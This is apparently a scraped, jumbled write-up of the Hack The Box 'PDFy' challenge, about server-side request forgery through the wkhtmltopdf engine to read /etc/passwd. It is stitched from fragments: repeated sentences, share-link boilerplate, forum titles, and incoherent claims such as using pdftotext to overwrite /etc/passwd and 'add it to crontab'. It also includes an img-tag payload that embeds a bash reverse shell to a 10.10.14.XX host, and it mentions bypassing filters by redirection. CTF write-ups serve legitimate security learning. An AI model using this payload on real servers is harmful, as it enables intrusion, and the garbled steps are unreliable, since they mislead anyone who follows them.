Htb Writeup Upd — Pdfy

The modified PDF file is then uploaded to the system.

To secure similar applications, developers are encouraged to use allow-lists for input, implement secure coding frameworks, and perform regular vulnerability scans to identify outdated or misconfigured libraries.

The challenge on Hack The Box (HTB) is an easy-rated web challenge focusing on Server-Side Request Forgery (SSRF) and exploiting vulnerable third-party components—specifically the HTML-to-PDF engine wkhtmltopdf .

Result: Obtain a service file containing credentials or an internal URL exposing an admin panel.

The backend returns the newly generated PDF filename. When you open or view the document in the provided , you will see a text printout of the server’s /etc/passwd configuration file right on your screen. pdfy htb writeup upd

add it to crontab

This public link is valid for 7 days and shares a thread, including any personal information you added. This link or copies made by others cannot be deleted. If you share with third parties, their policies apply. Can’t copy the link right now. Try again later. 【HTB Challenge】PDFy - ErrorPro

Official PDFy Discussion - Page 2 - Challenges - Hack The Box

I can provide more information on how to defend against these vulnerabilities if you specify your needs: The modified PDF file is then uploaded to the system

We use the pdftotext command to overwrite the /etc/passwd file:

<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>">

Start your local or cloud web server where exploit.php is hosted. Navigate back to the challenge interface.

Our first idea might be to try a straightforward path traversal attack. What if we host a simple HTML page that tries to load the server's local password file using a file:// URL? For example, the payload page index.html could look like this: Result: Obtain a service file containing credentials or

Often, direct internal IPs are blocked by basic filters. Step 3: Bypassing Filters with Redirection

In many HTB PDF challenges, the application processes the metadata of images embedded in the submitted page.

Using the SSRF, read the main PHP file that handles PDF generation.